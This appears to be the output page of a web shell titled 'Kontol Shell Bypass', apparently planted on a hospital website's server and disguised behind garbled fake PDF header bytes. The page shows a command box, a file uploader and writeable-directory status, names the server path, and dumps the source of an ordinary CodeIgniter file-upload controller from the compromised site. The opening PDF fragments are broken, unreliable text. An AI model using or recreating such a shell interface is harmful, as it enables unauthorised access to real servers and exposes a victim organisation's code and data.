%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :
ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/api/application/controllers_old/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/api/application/controllers_old/Files.php
<?php
class Files extends MY_Controller {
    function __construct() {
        parent::__construct();
		not_logged_res(); 
		$this->checkAccess('manage_files');
		$this->load->model("files_model", "file");
    }
	
	function lists(){
		$data=$this->file->lists();
		$this->json_data($data, true);
	}
	
	function save(){
		$inf=array('success'=>'F', 'msg'=>'Error!');
		$post=trim_array($this->input->post());

		$id=$post['id']=intval($post['id']);
		$this->form_validation->set_rules('title', 'Title', 'required', $this->req);
		if(!$id && empty($_FILES['file']['name'])){
			$this->form_validation->set_rules('file', 'File', 'required');
		}
		
		if(@$this->form_validation->run() == FALSE){
			$inf['errors']=$this->form_validation->get_errors();
			$inf['msg']=reset($inf['errors']);
		}else{
			/** File upload */
			if(!is_dir(UP_PATHF.'files/')){
				mkdir(UP_PATHF.'files/', 777, true);
			}
			if(!$id){
				$this->load->library('upload');
				$config=array(
					'upload_path'=>UP_PATHF.'files/', 
					'allowed_types'=>'gif|jpg|png|pdf|doc|xls|ppt|docx|xlsx|pptx', 
					'max_size'=>'2048',
					'max_filename'=>80,
					'file_ext_tolower'=>true,
				);
				$this->upload->initialize($config);
				if($this->upload->do_upload('file')){
					$post['file_name']=$this->upload->data('file_name');
					$post['file_ext']=$this->upload->data('file_ext');
					$post['file_size']=$this->upload->data('file_size');
					$post['is_image']=$this->upload->data('is_image');
				}else{
					$inf['msg']=strip_tags($this->upload->display_errors());
					$this->json_data($inf);
				}
			}
			/** \ */


			$data=filter_value($post, array('id', 'title', 'file_name', 'file_ext', 'file_size', 'is_image'));
			
			if($this->common->save($data, "files")){
				$inf['success']='T';
				$inf['msg']='File '.($id?'updated':'uploaded').' successfully';
			}
		}
		$this->json_data($inf);
	}
	
	function detail($id=0){
		$dtl=$this->file->detail($id);
		$this->json_data($dtl);
	}
	
	function delete(){
		$inf=array('success'=>'F', 'msg'=>'Can not deleted!');
		$id=intval($this->input->post('id'));
		$file=$this->db->select("file_name")->get_where("files", array('id'=>$id))->row()->file_name;
		if($this->file->delete($id)){
			if($file){
				del_file(UP_PATHF.'files/'.$file);
			}
			$inf['success']='T';
			$inf['msg']="File deleted successfully";
		}
		$this->json_data($inf);
	}
}

//EOF

Kontol Shell Bypass